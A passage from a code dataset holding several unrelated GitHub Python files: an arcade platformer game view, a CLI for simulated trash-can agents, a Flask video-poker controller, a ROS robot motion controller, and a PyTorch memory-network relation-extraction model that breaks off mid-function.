= obj.properties[\"boundary_left\"]\n if \"boundary_right\" in obj.properties:\n enemy.boundary_right = obj.properties[\"boundary_right\"]\n if \"change_x\" in obj.properties:\n enemy.change_x = obj.properties[\"change_x\"]\n\n self.scene.add_sprite(Constants.LAYER_NAME_ENEMIES, enemy)\n\n self.scene.add_sprite_list(Constants.LAYER_NAME_BULLETS)\n\n if self.tile_map.background_color:\n arcade.set_background_color(self.tile_map.background_color)\n\n self.physics_engine = arcade.PhysicsEnginePlatformer(\n self.player_sprite,\n platforms=self.scene[Constants.LAYER_NAME_MOVING_PLATFORMS],\n gravity_constant=Constants.GRAVITY,\n ladders=self.scene[Constants.LAYER_NAME_LADDERS],\n walls=self.scene[Constants.LAYER_NAME_PLATFORMS]\n )\n\n def on_show_view(self):\n self.setup()\n\n def on_draw(self):\n\n self.clear()\n\n self.camera.use()\n self.scene.draw()\n self.gui_camera.use()\n\n score_text = f\"Score: {self.score}\"\n arcade.draw_text(\n score_text,\n 10,\n 10,\n arcade.csscolor.BLACK,\n 18\n )\n\n def on_update(self, delta_time):\n\n self.physics_engine.update()\n\n if self.physics_engine.can_jump():\n self.player_sprite.jumping = False\n else:\n self.player_sprite.jumping = True\n \n if self.physics_engine.is_on_ladder() and not self.physics_engine.can_jump():\n self.player_sprite.is_on_ladder = True\n self.handle_input.process_keychange(self)\n else:\n self.player_sprite.is_on_ladder = False\n self.handle_input.process_keychange(self)\n \n if self.can_shoot:\n if self.shoot_pressed:\n arcade.play_sound(self.shoot_sound)\n bullet = arcade.Sprite(\":resources:images/space_shooter/laserBlue01.png\", Constants.SPRITE_SCALING_LASER)\n if self.player_sprite.facing_direction == 
Constants.RIGHT_FACING:\n bullet.change_x += Constants.BULLET_SPEED\n else:\n bullet.change_x -= Constants.BULLET_SPEED\n \n bullet.center_x = self.player_sprite.center_x\n bullet.center_y = self.player_sprite.center_y\n \n self.scene.add_sprite(Constants.LAYER_NAME_BULLETS, bullet)\n \n self.can_shoot = False\n else:\n self.shoot_timer += 1\n if self.shoot_timer == Constants.SHOOT_SPEED:\n self.can_shoot = True\n self.shoot_timer = 0\n \n # Update animations\n self.scene.update_animation(\n delta_time,\n [\n Constants.LAYER_NAME_COINS,\n Constants.LAYER_NAME_BACKGROUND,\n Constants.LAYER_NAME_PLAYER,\n Constants.LAYER_NAME_ENEMIES,\n ],\n )\n\n # Update moving platforms, enemies and bullets\n self.scene.update(\n [Constants.LAYER_NAME_ENEMIES, Constants.LAYER_NAME_MOVING_PLATFORMS,\n Constants.LAYER_NAME_BULLETS]\n )\n\n # See if enemy hit a boundary and needs to reverse direction\n for enemy in self.scene[Constants.LAYER_NAME_ENEMIES]:\n if enemy.boundary_right and enemy.right > enemy.boundary_right and enemy.change_x > 0:\n enemy.change_x *= -1\n\n if enemy.boundary_left and enemy.left < enemy.boundary_left and enemy.change_x < 0:\n enemy.change_x *= -1\n\n # Check for bullet collisions with enemies or platforms\n for bullet in self.scene[Constants.LAYER_NAME_BULLETS]:\n hit_list = arcade.check_for_collision_with_lists(\n bullet, \n [\n self.scene[Constants.LAYER_NAME_ENEMIES], \n self.scene[Constants.LAYER_NAME_PLATFORMS],\n self.scene[Constants.LAYER_NAME_MOVING_PLATFORMS]\n ]\n )\n \n if hit_list:\n bullet.remove_from_sprite_lists() \n for collision in hit_list:\n if self.scene[Constants.LAYER_NAME_ENEMIES] in collision.sprite_lists:\n collision.health -= Constants.BULLET_DAMAGE\n if collision.health <= 0:\n collision.remove_from_sprite_lists()\n self.score += 10\n arcade.play_sound(self.hit_sound)\n return\n \n # Remove bullet if off screen\n if bullet.right < 0 or bullet.left > (self.tile_map.width * self.tile_map.tile_width) * Constants.TILE_SCALING:\n bullet.remove_from_sprite_lists()\n \n player_collision_list = arcade.check_for_collision_with_lists(\n self.player_sprite,\n [\n self.scene[Constants.LAYER_NAME_COINS],\n self.scene[Constants.LAYER_NAME_ENEMIES]\n ]\n )\n\n for collision in player_collision_list:\n if self.scene[Constants.LAYER_NAME_ENEMIES] in collision.sprite_lists:\n arcade.play_sound(self.game_over)\n game_view = GameOverView()\n self.window.show_view(game_view)\n return\n else:\n if \"Points\" not in collision.properties:\n print(\"Warning, collected a coin without a Points property\")\n else:\n points = int(collision.properties[\"Points\"])\n self.score += points\n # Remove the coin\n collision.remove_from_sprite_lists()\n arcade.play_sound(self.collect_coin_sound)\n\n self.center_camera_to_player()\n\n def center_camera_to_player(self, speed=0.2):\n screen_center_x = self.camera.scale * (\n self.player_sprite.center_x - (self.camera.viewport_width / 2)\n )\n screen_center_y = self.camera.scale * (\n self.player_sprite.center_y - (self.camera.viewport_height / 2)\n )\n\n if screen_center_x < 0:\n screen_center_x = 0\n if screen_center_y < 0:\n screen_center_y = 0\n\n player_centered = (screen_center_x, screen_center_y)\n\n self.camera.move_to(player_centered, speed)\n\n def process_keychange(self):\n self.handle_input.process_keychange(self)\n\n def on_key_press(self, key, modifiers):\n self.handle_input.on_key_press(self, key, modifiers)\n\n def on_key_release(self, key, modifiers):\n self.handle_input.on_key_release(self, key, modifiers)\n\n def 
on_mouse_scroll(self, x, y, scroll_x, scroll_y):\n self.handle_input.on_mouse_scroll(self, x, y, scroll_x, scroll_y)\n\n\nclass GameOverView(arcade.View):\n\n def on_show_view(self):\n arcade.set_background_color(arcade.color.BLACK)\n\n def on_draw(self):\n self.clear()\n\n arcade.draw_text(\n \"Game Over - Click to restart\",\n Constants.SCREEN_WIDTH / 2,\n Constants.SCREEN_HEIGHT / 2,\n arcade.color.WHITE,\n 30,\n anchor_x=\"center\"\n )\n\n def on_mouse_press(self, _x, _y, _button, _modifiers):\n game_view = GameView()\n self.window.show_view(game_view)\n","repo_name":"Mauw94/py-arcade-zombie-survival","sub_path":"source/views/game_view.py","file_name":"game_view.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43654871256","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport re\nfrom os.path import join\nfrom typing import Optional as Option\nfrom decimal import Decimal\n\nimport click\n\nfrom .Agent import Agent\nfrom .AgentManager import AgentManager\n\n\n@click.group()\n@click.version_option(prog_name='fake_agent', version='0.2.0')\ndef cli() -> None:\n pass\n\n\n@click.option(\n '-n', '--name',\n help='Specify a unique agent to run.',\n type=str\n)\n@click.option(\n '-d', '--directory',\n default='.fake_agent',\n help='The directory in which to load the agent(s).'\n)\n@click.option(\n '-h', '--host',\n help='Select only the agents belonging to a specific host.'\n)\n@cli.command()\ndef run(\n name: Option[str],\n directory: str,\n host: Option[str]\n) -> None:\n \"\"\"Run the specified agent(s)\"\"\"\n if name:\n agent = Agent.from_directory(join(directory, name))\n if host and agent.host != host:\n click.echo(f\"Agent host {agent.host} does not match {host}\")\n return\n agent.start()\n agent.join()\n else:\n manager = AgentManager(directory, host)\n manager.start()\n\n\n@click.option(\n '-h', '--hostname',\n default='localhost',\n help='The IAM server IP or FQDN.'\n)\n@click.option(\n '--port',\n default=None,\n help='The port on which to contact the IAM server. Defaults to 80 or 443 if ssl is specified.',\n type=int\n)\n@click.option(\n '--ssl/--no-ssl',\n default=False,\n help='Whether to use a secure connection when contacting the IAM server.'\n)\n@click.option(\n '-u', '--username',\n prompt=True,\n help='Server administrator username.'\n)\n@click.option(\n '-p', '--password',\n prompt=True,\n help='Server administrator password.'\n)\n@click.option(\n '-n', '--name',\n help='The agent name.'\n)\n@click.option(\n '-s', '--speed',\n help='The speed factor, influences the time taken for an agent to fill up.',\n default=\"1.5:0.5\"\n)\n@click.option(\n '-d', '--directory',\n default='.fake_agent',\n help='The directory in which to save the agent(s).'\n)\n@click.option(\n '-c', '--count',\n default=1,\n help='The number of generated agents.'\n)\n@click.argument('location')\n@cli.command()\ndef generate(\n hostname: str,\n port: Option[int],\n ssl: bool,\n username: str,\n password: str,\n name: str,\n speed: float,\n directory: str,\n count: int,\n location: str,\n) -> None:\n \"\"\"\n Generate (a) fake trash can(s) and publish it/these to the specified server\n or localhost:80 if the server is left unspecified.\n\n LOCATION must be a 'latitude:longitude:radius' location. 
Specifies the\n geographical position around which the trash can shall be located.\n \"\"\"\n if count < 1:\n return\n\n port = port if port else (443 if ssl else 80)\n\n lat, lon, radius = map(Decimal, location.split(':'))\n ids = (username, password)\n location_hint = (lat, lon, radius)\n speed, delta = map(float, speed.split(\":\"))\n\n if count == 1:\n # pass the same connection and speed options as the multi-agent path below\n agent = Agent.generate(\n ids, location_hint, name, directory, hostname, port, ssl,\n speed=(speed, delta)\n )\n click.echo(f\"Agent {agent.name} generated in {agent.root}!\", err=True)\n click.echo(agent.name)\n return\n\n for n in range(1, count+1):\n agent = Agent.generate(\n ids, location_hint, f\"{name}_{n}\", directory, hostname, port, ssl,\n speed=(speed, delta)\n )\n click.echo(f\"Agent {agent.name} generated in {directory}!\", err=True)\n click.echo(agent.name)\n\n click.echo(f\"Generated {count} agents\", err=True)\n\n\n@click.option(\n '-d', '--directory',\n default='.fake_agent',\n help='The directory in which to load the agent(s).'\n)\n@click.option(\n '-h', '--host',\n help='Select only the agents belonging to a specific host.'\n)\n@cli.command()\ndef show(directory: str, host: Option[str]):\n \"\"\"Lists the available agents\"\"\"\n\n host_regex = re.compile(host) if host else None\n manager = AgentManager(directory)\n agents = []\n hosts = []\n\n for agent in manager.agents:\n if host is None or host_regex.match(agent.host):\n agents.append(agent)\n if agent.host not in hosts:\n hosts.append(agent.host)\n click.echo(f\"{agent.name}@{agent.host}: speed={agent.speed}\")\n\n click.echo(f\"{len(agents)} agents on {len(hosts)} host(s).\")\n\n\n@click.option(\n '-d', '--directory',\n default='.fake_agent',\n help='The directory in which to load the agent(s).'\n)\n@click.option(\n '-h', '--host',\n help='Select only the agents belonging to a specific host.'\n)\n@click.option(\n '-n', '--name',\n help='The agent name.'\n)\n@click.option(\n '--stale/--no-stale',\n default=True,\n help='Whether to consider only agents which are no longer active.'\n)\n@click.option(\n '-u', '--username',\n prompt=True,\n help='Server administrator username.'\n)\n@click.option(\n '-p', '--password',\n prompt=True,\n help='Server administrator password.'\n)\n@cli.command()\ndef remove(directory, host, name, stale, username, password):\n \"\"\"Remove the specified agent(s)\"\"\"\n ids = (username, password)\n if name:\n agent = Agent.from_directory(join(directory, name))\n if host and agent.host != host:\n click.echo(f\"Agent host {agent.host} does not match {host}\")\n return\n agent.remove(ids, stale)\n else:\n manager = AgentManager(directory, host)\n for agent in manager.agents:\n agent.remove(ids, stale)\n\n\nif __name__ == '__main__':\n cli.main(args=sys.argv[1:], prog_name=\"fake_agent\")\n","repo_name":"LeGroupeDeFer/IAM","sub_path":"fake_agent/fake_agent/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27703970370","text":"from flask import render_template, request, url_for, redirect, flash, session\nimport random\nfrom modules.gain import partie\nfrom modules.util import tirage, mapCardsToImg\n\nclass Controller:\n\n def __init__(self):\n pass\n\n def homepage(self):\n \"\"\"\n Displays the home page of the web interface\n\n Its state changes according to the bank balance\n \"\"\"\n if \"bankroll\" in session and session[\"bankroll\"] == 0:\n flash('Bank depleted: game over!','error')\n del session[\"bankroll\"]\n return 
render_template(\"homepage.html\")\n\n\n\n\n def restart(self):\n \"\"\"\n Réinitialise le vidéo-poker : la banque sera donc supprimée\n \"\"\"\n del session[\"bankroll\"]\n return redirect('/')\n\n\n\n def start_video_poker(self):\n \"\"\"\n Fonction prenant en compte le montant de la banque,\n puis de la mise afin de tirer des cartes à l'utilisateur\n\n \"\"\"\n initial_deck = ['2-h','3-h','4-h','5-h','6-h','7-h','8-h','9-h','10-h','J-h','Q-h','K-h','A-h','2-d','3-d','4-d','5-d','6-d','7-d','8-d','9-d','10-d','J-d','Q-d','K-d','A-d','2-c','3-c','4-c','5-c','6-c','7-c','8-c','9-c','10-c','J-c','Q-c','K-c','A-c','2-s','3-s','4-s','5-s','6-s','7-s','8-s','9-s','10-s','J-s','Q-s','K-s','A-s']\n \n #on récupère le montant de la banque et la mise depuis le formulaire\n #si le montant de la banque existe déjà en session, on le récupère\n bank,mise = (request.form[\"bank\"] if (\"bankroll\" not in session) else session[\"bankroll\"]), request.form[\"mise\"]\n \n if bank == 0:\n return redirect('/')\n if int(bank) - int(mise) < 0:\n flash('Mise trop élevée : veuillez réessayer', 'error')\n return redirect('/')\n else:\n #on mélange les cartes\n cartes_tirees,new_deck = tirage(initial_deck)\n session[\"bankroll\"] = int(bank) - int(mise)\n session[\"mise\"] = int(mise)\n #on sauve le deck mélangé en session pour le prochain tirage\n session[\"deck\"] = new_deck\n #on renvoie le template qui propose les cartes à garder (on associe chaque carte à son image correspondante pour l'affichage -> mapCardsToImg)\n return render_template('board.html',deck=session[\"deck\"],cartes=mapCardsToImg(cartes_tirees)), 201\n\n\n\n def second_shuffle(self):\n \"\"\"\n Fonction permettant de faire un second tirage\n mais cette fois-ci pour tester les différentes combinaisons gagnates\n\n Le montant de la banque, capturée en session sera modifié ou non selon le résultat (oui si gagnant)\n \"\"\"\n #récupération des cartes que le joueur souhaite garder\n choix_joueur: list = request.form.getlist(\"carte[]\")\n #pour récupérer le deck précédemment modifié\n cartes_tirees,new_deck = tirage(session[\"deck\"],choix_joueur)\n #on décompose chaque carte en un dictionnaire contenant la couleur et la valeur\n decomposition_cartes = [ dict({ \"couleur\": ensemble[1], \"valeur\": ensemble[0] }) for ensemble in [carte.split(\"-\") for carte in cartes_tirees ]]\n session[\"bankroll\"],resultat = partie(session[\"mise\"],session[\"bankroll\"],decomposition_cartes)\n \n return render_template('board.html',deck=new_deck,cartes=mapCardsToImg(cartes_tirees),resultat=resultat),201","repo_name":"ii02735/ipssi_projet_pocker","sub_path":"modules/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8919807970","text":"#!/usr/bin/env python\n\nimport rospy\nimport time\nimport numpy as np\nfrom controlador import controller\nfrom dynamic_reconfigure.server import Server\nfrom rycsv_kobuki_localization.cfg import controllerConfig\nfrom geometry_msgs.msg import Twist\n\ndef angle_between(p0,p1,p2):\n v0 = np.array(p1) - np.array(p0)\n v1 = np.array(p2) - np.array(p0)\n\n angle = np.math.atan2(np.linalg.det([v0,v1]),np.dot(v0,v1))\n return angle\n\ndef xy2traj(dots):\n \"\"\"\n From xy coordinates generates a complete trajectory\n\n Takes x,y coordinates of a trajectory and calculates x,y,theta coordinates\n with intermidiate points that assure twists of 90\n \n Parameters\n ----------\n dots : list of 
[x,y]\n Dots [[x_0,y_0],[x_1,y_1],...]\n\n Returns\n -------\n list of [x,y,theta]\n Complete trajectory\n\n \"\"\"\n traj = []\n last_dot = 0 \n last_x = 0\n last_y = 0\n for count, dot in enumerate(dots):\n x = dot[0]\n y = dot[1]\n if (count == 0) :\n theta = 90\n traj.append([x,y,theta]) #Initial heading (deg)\n else:\n theta = angle_between(last_dot,[last_x+1,last_y],dot)\n traj.append([last_x,last_y,np.rad2deg(theta)])\n traj.append([x,y,np.rad2deg(theta)])\n last_dot = dot\n last_theta = theta\n last_x = x\n last_y = y\n return traj\n\n#Callback function from dynamic reconfigure\ndef callback(config, level):\n global dyn_flag\n dyn_flag = 1\n print('Param change requested...')\n return config\n \n\nif __name__ == \"__main__\":\n\n #Node initialization\n rospy.init_node(\"motion_control\", anonymous = False)\n rate = rospy.Rate(50) # 50 Hz ROS\n\n #Controller init\n kobuki_controller = controller()\n\n #Dynamic reconfigure flag\n dyn_flag = 0\n\n #Dynamic reconfigure server initialization\n srv = Server(controllerConfig, callback)\n\n #Wheel speed publisher\n nameSpeedTopic = \"/mobile_base/commands/velocity\"\n kobuki_speed_pub = rospy.Publisher(nameSpeedTopic, Twist, queue_size=10)\n command = Twist()\n\n #Trajectory dots (No orientation)\n dots = [\n [0, 0], [-3.5, 0], [-3.5, 3.5], [1.5, 3.5],\n [1.5, -1.5], [3.5, -1.5], [3.5, -8.0], \n [-2.5, -8.0], [-2.5, -5.5], [1.5, -5.5], \n [1.5, -3.5], [-1.0, -3.5]\n ]\n\n #Add orientation to trajectory\n traj = xy2traj(dots)\n traj = np.array(traj)\n #Trajectory limits\n goal_id = 0\n dot_count, coord = traj.shape\n\n #Initial point\n kobuki_controller.set_goal(traj[goal_id][0],traj[goal_id][1],traj[goal_id][2])\n print(\"--\")\n print(\"GOAL\")\n print(\"X: \"+str(kobuki_controller.x_goal))\n print(\"Y: \"+str(kobuki_controller.y_goal))\n print(\"Z: \"+str(kobuki_controller.th_goal))\n print(\"--\")\n #Node Loop\n while(not rospy.is_shutdown()):\n \n #Check and change controllers params if requested \n if dyn_flag == 1:\n kobuki_controller.set_controller_params()\n dyn_flag = 0\n\n #Get \"now\" time to synchronize target tf and error tf \n now = rospy.Time.now()\n\n #Broadcast goal TF\n kobuki_controller.broadcast_goal(now)\n\n #Control methods\n kobuki_controller.compute_error(now)\n kobuki_controller.transform_error()\n kobuki_controller.control_speed()\n\n #Publish Speed\n command.linear.x = kobuki_controller.v_out\n command.angular.z = kobuki_controller.w_out\n kobuki_speed_pub.publish(command)\n\n #Check if goal has been reached\n kobuki_controller.check_goal_reached()\n if kobuki_controller.done: \n print(\"Goal has been reached...\")\n print(\"--\")\n goal_id = goal_id+1 #Change point when arrived to goal\n\n if goal_id == dot_count:\n goal_id = goal_id-1 #Wait at last point\n #goal_id = 0 #Go back to initial point\n\n kobuki_controller.set_goal(traj[goal_id][0],traj[goal_id][1],traj[goal_id][2])\n now = rospy.Time.now()\n kobuki_controller.broadcast_goal(now) \n kobuki_controller.compute_error(now)\n\n #Check and change controllers params if requested \n if dyn_flag == 1:\n kobuki_controller.set_controller_params()\n dyn_flag = 0\n \n rate.sleep() #Wait for ROS node cycle\n \n\n\n\n","repo_name":"JurgenHK/RyCSV-Taller-4---Navegacion","sub_path":"scripts/motion_control.py","file_name":"motion_control.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"8780250767","text":"import torch\nimport torch.autograd as ag\nimport torch.nn as nn\nimport torch.optim as optim\nimport pdb\nimport torch.utils.data as data\nimport torch.nn.functional as F\nimport sklearn.metrics as metrics\nimport math\nimport numpy as np\n# from utils import pad_sequence, pad_labels, to_var, clip\n\ntorch.cuda.manual_seed(1)\ntorch.manual_seed(1)\n\nclass AttrProxy(object):\n def __init__(self, module, prefix):\n self.module = module\n self.prefix = prefix\n\n def __getitem__(self, i):\n return getattr(self.module, self.prefix + str(i))\n\n# the position embedding of attention is all you need.\n# https://github.com/jadore801120/attention-is-all-you-need-pytorch/blob/master/transformer/Models.py\ndef position_encoding_init(n_position, d_pos_vector):\n position_encode = np.array([\n [pos / np.power(10000, 2 * (j // 2) / d_pos_vector) for j in range(d_pos_vector)]\n for pos in range(n_position)\n ])\n position_encode[:, 0::2] = np.sin(position_encode[:, 0::2])\n position_encode[:, 1::2] = np.cos(position_encode[:, 1::2])\n return torch.from_numpy(position_encode).type(torch.FloatTensor)\n\n\nclass GroupBatchnorm2d(nn.Module):\n def __init__(self, c_num, group_num = 16, eps = 1e-10):\n super(GroupBatchnorm2d,self).__init__()\n self.group_num = group_num\n self.gamma = nn.Parameter(torch.ones(c_num, 1, 1))\n self.beta = nn.Parameter(torch.zeros(c_num, 1, 1))\n self.eps = eps\n\n def forward(self, x):\n N, C, H, W = x.size()\n\n x = x.view(N, self.group_num, -1)\n\n mean = x.mean(dim = 2, keepdim = True)\n std = x.std(dim = 2, keepdim = True)\n\n x = (x - mean) / (std+self.eps)\n x = x.view(N, C, H, W)\n\n return x * self.gamma + self.beta\n\n# mem net model used for riedel model\nclass MEM_CNN_RIEDEL(nn.Module):\n def __init__(self, settings):\n super(MEM_CNN_RIEDEL, self).__init__()\n\n self.use_cuda = settings['use_cuda']\n self.cuda_devices = [4, 5, 6, 7]\n\n self.word_embed_size = settings['word_embed_size']\n self.vocab_size = settings['vocab_size']\n self.n_rel = settings['n_rel']\n self.hidden_size = 50\n self.features_size = settings['word_embed_size']\n self.tri_attention = settings['tri_attention']\n\n\n self.pos_embed_size = 5\n self.features_size += 2 * self.pos_embed_size\n # define the position embedding effective domain\n # self.max_len = 60\n self.pos_limit = settings['pos_limit']\n # number of output channels for CNN\n # self.out_c = 230\n self.out_c = settings['out_c']\n self.sent_feat_size = self.out_c\n self.dropout_p = settings['dropout_p']\n pre_word_embeds = settings['word_embeds']\n self.version = settings['version']\n self.remove_origin_query = settings['remove_origin_query']\n\n self.w2v = nn.Embedding(self.vocab_size, self.word_embed_size, padding_idx=self.vocab_size-1)\n # word embedding\n if pre_word_embeds is not None:\n self.pre_word_embed = True\n self.w2v.weight.data[:pre_word_embeds.shape[0]] = nn.Parameter(torch.FloatTensor(pre_word_embeds), requires_grad=True)\n else:\n self.pre_word_embed = False\n\n self.position_embedding = settings['position_embedding']\n if settings['position_embedding']:\n self.pos1_embed = nn.Embedding(self.pos_limit * 2 + 1, self.pos_embed_size)\n self.pos2_embed = nn.Embedding(self.pos_limit * 2 + 1, self.pos_embed_size)\n else:\n self.features_size -= 2 * self.pos_embed_size\n\n # too : here we only have one convolution layer, the results only depends on 3 words windows.\n # cannot case big picture results\n # maybe more layers of CNN\n self.window = 3\n self.conv = nn.Conv2d(1, self.out_c, 
(self.window, self.features_size), padding=(self.window-1, 0), bias=False)\n self.conv_bias = nn.Parameter(torch.zeros(1, self.out_c),requires_grad=True)\n\n self.memory_decay_weight = settings['memory_decay_weight']\n\n # entity embeddings for creating queries\n self.en_embed_size = settings['entity_embed_size']\n # self.n_entity = settings['n_entity']\n pre_en_embeds = settings['entity_pretrained_vecs']\n if pre_en_embeds is not None:\n self.en_embed = nn.Embedding(*pre_en_embeds.shape)\n # here pre_en_embeds are np arrays\n pre_length = pre_en_embeds.shape[0]\n self.en_embed.weight.data[:pre_length] = torch.FloatTensor(pre_en_embeds)\n\n self.bag_size = 30\n self.out_feature_size = self.out_c\n\n self.bag_size = 30\n order_embed = settings['order_embed']\n if order_embed is True:\n self.order_embed_size = 50\n self.order_embed = nn.Embedding(self.bag_size, self.order_embed_size, padding_idx=0)\n self.out_feature_size = self.out_feature_size + self.order_embed_size\n tmp_con = math.sqrt(6.0 / (self.bag_size + self.order_embed_size))\n nn.init.uniform_(self.order_embed.weight, a=-tmp_con, b=tmp_con)\n circular_embedding = settings['circular']\n if circular_embedding:\n self.order_embed.weight.data = position_encoding_init(self.bag_size, self.order_embed_size)\n self.order_embed.weight.requires_grad = False\n else:\n self.order_embed = None\n\n self.use_rank = False\n\n if not settings['scalable_circular']:\n self.order_weight = settings['order_weight']\n else:\n self.order_weight = nn.Parameter(torch.Tensor([1.]), requires_grad=True)\n\n self.r_embed = nn.Parameter(torch.zeros(self.n_rel, self.out_c), requires_grad=True)\n self.r_bias = nn.Parameter(torch.zeros(self.n_rel), requires_grad=True)\n\n self.ln = nn.LayerNorm(self.out_feature_size)\n\n self.query_dim = self.out_feature_size\n self.phi_q = nn.Parameter(torch.randn(self.en_embed_size, self.query_dim), requires_grad=True)\n\n self.atten_sm = nn.Softmax(dim=-1)\n self.pred_sm = nn.LogSoftmax(dim=-1)\n\n\n # normalization over CNN outputs\n # self.group_norm = GroupBatchnorm2d(self.out_c)\n\n self.max_hops = settings['max_hops']\n self.hop_size = 2 if self.version else self.max_hops\n memory_dim = self.query_dim\n for i in range(self.hop_size):\n # also add bias ?\n C = nn.Linear(self.out_feature_size, memory_dim, bias=False)\n # C.weight.data.normal_(0, 0.1)\n C.weight.data = torch.diag(torch.ones(memory_dim))\n self.add_module('C_{}'.format(i), C)\n self.C = AttrProxy(self, 'C_')\n\n self.query_type = settings['query_type']\n if self.query_type == 'SELF':\n self.M = nn.Linear(self.out_feature_size, memory_dim, bias=False)\n\n # relation embedding size is the same as MEM's output\n eye = torch.eye(self.out_c, self.out_c)\n self.att_W = nn.Parameter(eye.expand(self.n_rel, self.out_c, self.out_c), requires_grad=True)\n\n # NLL loss is apllied to logit outputs\n\n # only use for debugging\n self.relu = nn.ReLU()\n self.tanh = nn.Tanh()\n self.dropout = nn.Dropout(p=self.dropout_p, inplace=False)\n\n con1 = math.sqrt(6.0 / ((self.pos_embed_size + self.word_embed_size)*self.window))\n nn.init.uniform_(self.conv.weight, a=-con1, b=con1)\n nn.init.uniform_(self.conv_bias, a=-con1, b=con1)\n\n con = math.sqrt(6.0/(self.out_c + self.n_rel))\n nn.init.uniform_(self.r_embed, a=-con, b=con)\n nn.init.uniform_(self.r_bias, a=-con, b=con)\n\n def forward(self, inputs):\n # the return of cnn is stored as memories for latter query.\n bz = len(inputs)\n # pdb.set_trace()\n mem_bags = self._create_sentence_embedding(inputs)\n # first I try the 
queries with time.\n # queries = self._create_queries_2(kwargs['en_pairs'])\n if self.query_type == 'ENTITY':\n queries = self._create_queries_2(inputs)\n elif self.query_type == 'SELF':\n queries = self._create_queries_4(inputs, encoding_output=mem_bags)\n else:\n queries = self._create_queries_3(inputs)\n\n # queries = self._create_queries_2(inputs)\n labels = [item['label'] for item in inputs]\n predicts = self._predict_bag(mem_bags, queries, labels=labels)\n if self.training:\n predicts = predicts[torch.arange(0, bz).long().cuda(), labels]\n # score is the same, but normalize over different set!\n scores = torch.matmul(predicts, self.r_embed.t()) + self.r_bias\n pred = self.pred_sm(scores)\n else:\n scores = torch.matmul(predicts, self.r_embed.t()) + self.r_bias\n pred = self.pred_sm(scores.view(-1, self.n_rel)).view(bz, self.n_rel, self.n_rel).max(1)[0]\n return pred\n\n # todo: also wanna use self-attention to form the encoding part.\n def _create_sentence_embedding(self, inputs):\n bags = [item['bag'] for item in inputs]\n batch_features = []\n for ix, bag in enumerate(bags):\n features = []\n for item in bag:\n w2v = self.w2v(item.t()[0])\n # this may need some modification for further use.\n pos1 = self.pos1_embed(item[:, 1])\n pos2 = self.pos2_embed(item[:, 2])\n feature = torch.cat([w2v, pos1, pos2], dim=-1).unsqueeze(0).unsqueeze(0)\n feature = self.conv(feature).squeeze(-1)\n feature = F.max_pool1d(feature, feature.size(-1)).squeeze(-1) + self.conv_bias\n # this tanh is little different from lin-16's.\n feature = self.tanh(feature)\n feature = self.dropout(feature)\n # dropout is a little different too.\n features.append(feature)\n\n # shape : bag_size * D\n features = torch.cat(features, dim=0)\n features = self.dropout(features)\n # features = self.ln(features)\n\n batch_features.append(features)\n return batch_features\n\n def _create_queries(self, en_pairs):\n lookup_var = torch.cuda.LongTensor(en_pairs)\n batch_en_embeds = self.en_embed(lookup_var)\n en1_embeds, en2_embeds = torch.split(batch_en_embeds, 1, dim=1)\n # one ways to compute queries\n queries = torch.matmul((en1_embeds + en2_embeds).view(-1, self.en_embed_size), self.phi_q)\n\n return queries\n\n # query_type : entity + r_embed\n def _create_queries_2(self, inputs, encoding_output=None):\n en_pairs = [item['en_pair'] for item in inputs]\n batch_size = len(en_pairs)\n lookup_var = torch.cuda.LongTensor(en_pairs)\n batch_en_embeds = self.en_embed(lookup_var)\n en1_embeds, en2_embeds = torch.split(batch_en_embeds, 1, dim=1)\n entity_queries = torch.matmul((en1_embeds + en2_embeds).view(-1, self.en_embed_size), self.phi_q)\n # queries = self.r_embed.expand((batch_size, ) + self.r_embed.size()) + entity_queries.unsqueeze(1)\n queries = torch.stack([self.r_embed] * batch_size) + entity_queries.unsqueeze(1)\n return queries\n\n # query_type : r_embed\n def _create_queries_3(self, inputs, encoding_output=None):\n batch_size = len(inputs)\n # without entity queries\n # queries = self.r_embed.expand((batch_size, ) + self.r_embed.size())\n # queries = []\n # for _ in range(batch_size):\n # queries.append(self.r_embed)\n queries = torch.stack([self.r_embed] * batch_size)\n return queries\n\n # query_type : self\n def _create_queries_4(self, inputs, encoding_output=None):\n bz = len(inputs)\n ret = []\n for item in encoding_output:\n ret.append(self.M(item))\n return ret\n\n # this is for riedel-10 dataset\n def _predict_bag(self, mem_bags, queries, labels=None):\n bz = len(labels)\n ret = []\n # trained one by one\n # 
memory is bag_size * out_dim\n for ix, memory in enumerate(mem_bags):\n # query here is with size : n_rel * D\n query_r = queries[ix]\n\n # query : bag_size * n_rel * query_size\n query = query_r\n\n for hop in range(self.max_hops):\n # key val version\n if self.version == 1:\n m_key = self.C[0](memory)\n m_val = self.C[1](memory)\n # layer sharing version\n elif self.version == 0:\n m_key = self.C[hop](memory)\n m_val = self.C[hop](memory)\n else:\n m_key = memory\n m_val = memory\n # softmax need 2D tensor\n # each query over all memories\n # tmp = torch.matmul(query, m_key.t())\n if self.query_type != 'SELF':\n # tmp = torch.bmm(query.unsqueeze(1),\n # torch.matmul(self.att_W, m_key.t())).squeeze(1)\n tmp = torch.matmul(query, m_key.t())\n else:\n tmp = torch.matmul(query, m_key.t())\n\n prob_size = tmp.size()\n prob = self.atten_sm(tmp.view(-1, m_key.size(0)))\n prob = prob.view(prob_size)\n\n # for each query and each relation\n o_k = torch.matmul(prob, m_val)\n\n # update its query_r\n\n # query = query + o_k * self.memory_decay_weight\n query = query + o_k\n\n # can substract the query vector out to find which is our target.\n # only when D_r == D_q\n # can be compatible with different construction of queries.\n if self.remove_origin_query:\n query = query - query_r\n\n # additional selective attention is applied\n if self.query_type == 'SELF':\n atten_weights = self.atten_sm(torch.bmm(self.r_embed.unsqueeze(1),\n torch.matmul(self.att_W, query.t())).squeeze(1))\n # n_rel * D\n query = torch.matmul(atten_weights, query)\n\n if self.dropout is not None:\n query = self.dropout(query)\n if not self.training:\n query = query * 0.5\n\n # testing this scheme\n # modified = False\n # if modified:\n # labels = labels[ix]\n # if self.training:\n # query 